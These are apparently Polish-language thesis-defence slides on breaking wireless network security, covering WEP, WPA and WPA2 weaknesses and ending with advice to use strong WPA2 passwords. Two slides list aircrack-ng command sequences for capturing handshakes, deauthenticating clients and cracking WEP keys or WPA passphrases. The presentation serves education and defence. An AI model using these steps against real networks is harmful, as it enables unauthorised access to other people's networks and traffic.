Łamanie 
zabezpieczeń 
sieci 
bezprzewodowyc
h

Adrian Kabała

Krakowska Akademia

im. Andrzeja Frycza Modrzewskiego 

Kierunek: Informatyka i ekonometria

Promotor: prof. zw. Dr hab. Tadeusza Grabińskiego

Cel pracy



Zarys problemu bezpieczeństwa w 
sieciach



Słabości standardu WEP, WPA i WPA2



Problem wynikający z złamania hasła 
przez intruza

Rozdział I – Problem 
bezpieczeństwa w sieciach

jest bardzo ważnym aspektem użytkowania 

Internetu. 

Zagrożenia płynące z Internetu – metody ataków:



Ataki z zewnątrz sieci lokalnej 

(DoS, wirusy, XSS, 

penetracja poprzez sieć bezprzewodową)



Ataki z wnętrza sieci lokalnej 

(ARP, RARP)

Klasy ataków:



Ataki pasywne – podsłuchiwanie



Ataki aktywne – modyfikacja i spreparowanie danych

Ochrona poprzez Firewall



Blokowanie dostępu do usług i komponentów dla osób, 

które nie powinny mieć do nich dostępu



Ochrona systemów przed atakami na dziurawe 

oprogramowanie sieciowe



Ochrona dziurawych systemów operacyjnych



Zapobieganie podsłuchiwaniu oraz wyciekom informacji 

z sieci wew.



Ochrona przed fałszowaniem adresów IP



Wydzielanie fragmentów sieci o zróżnicowanym 

poziomie bezpieczeństwa

Rozdział II - WEP



uniemożliwienie ujawniania 
zawartości transmitowanych 
pakietów, 



uniemożliwienie modyfikacji 
transmitowanych pakietów,



zapewnienie kontroli dostępu do 
sieci.

Uwierzytelnianie w WEP

1. Uwierzytelnianie otwarte (OSA)

2. Uwierzytelnianie kluczem współdzielonym (SKA)

3. Weryfikacja MAC

Rozdział II 

- Bezpieczeństwo sieci 

WEP



zbyt krótki VI (24 bity – wystarczy niecałe 

5000 pakietów, by osiągnąć 

pięćdziesięcioprocentowe 

prawdopodobieństwo kolizji) i dopuszczenie 

powtórnego wykorzystania tego samego VI 

(brak ochrony przed atakami z 

powtórzeniem wiadomości),



brak przyzwoitego sprawdzania 

integralności (algorytm CRC32 nadaje się do 

wykrywania błędów, ale nie jest 

kryptograficznie bezpieczny ze względu na 

swą liniowość),



brak wbudowanej metody aktualizacji kluczy

Słabość WEP



Tylko 16777216 różnych możliwych wartości 
IV



Obecność słabych wartości IV



Inicjalizacja resetuje sekwencje wektora IV



Chop-Chop

Atak na sieć WEP 



airodump-ng wlan0



airodump-ng -c 1 –bssid 
00:16:B6:D9:58:71 wlan0 –w nazwa_pliku



aireplay-ng -0 1 –a 00:16:b6:d9:58:71 –c 
00:60:b3:d4:51:f3 wlan0



aircrack-ng /root/testka/test-01.cap

Hasło: A1:A2:A3:A4:A5

Rozdział III - Bezpieczeństwo 

sieci WPA i WPA2

WPA (2003 r.) WPA2(2004r.)

•Personal  (TKIP, CCMP)

•Enterprise - Radius

Zarządzanie 
kluczami i 
uwierzytelnian
ie

PMK – klucz główny
PTK – dla TKIP: 2 x EAPOL, TEK, 
MIC.
PTK – dla CCMP: – 2 x EAPOL, 
TK

Słabość WPA i WPA2

PMK = PBKDF2 (hasło, SSID, ssidLength, 4096, 

256)

PTK = HMAC, 2x MAC, 2x ID Nonces

Rozdział IV - Tablice tęczowe

• Szybkość
• Oszczędność mocy obliczeniowej
• Duża ilość haseł
• Słaba dostępność

Atak na sieć WPA/WPA2-PSK

1.

Backtrack

2.

airodump-ng mon0

3.

airodump-ng –c 6 -–bbsid 00:1E:E5:99:08:78 
 –w /root/armagedon mon0

4.

  aireplay-ng –0 1 -a 00:1E:E5:99:08:78 –c 
2:E0:2C:5E:4F:DB  mon0

5.

  aircrack-ng –w słownik.txt –b 
00:1E:E5:99:08:78 /root/Armagedon-01.cap



WiFite – łatwiej się nie da.



Atak Wi-Fi Protected Setup



Skrypt pobierający hasła

Wnioski

 

• Nie stosować WEP – nawet 

korzystając z dodatkowych 
zabezpieczeń

• Jeżeli WPA lub WPA2 PSK, to tylko z 

silnym hasłem

• Najlepiej WPA2 – AES, lub Radius

Dziękuje bardzo za uwagę.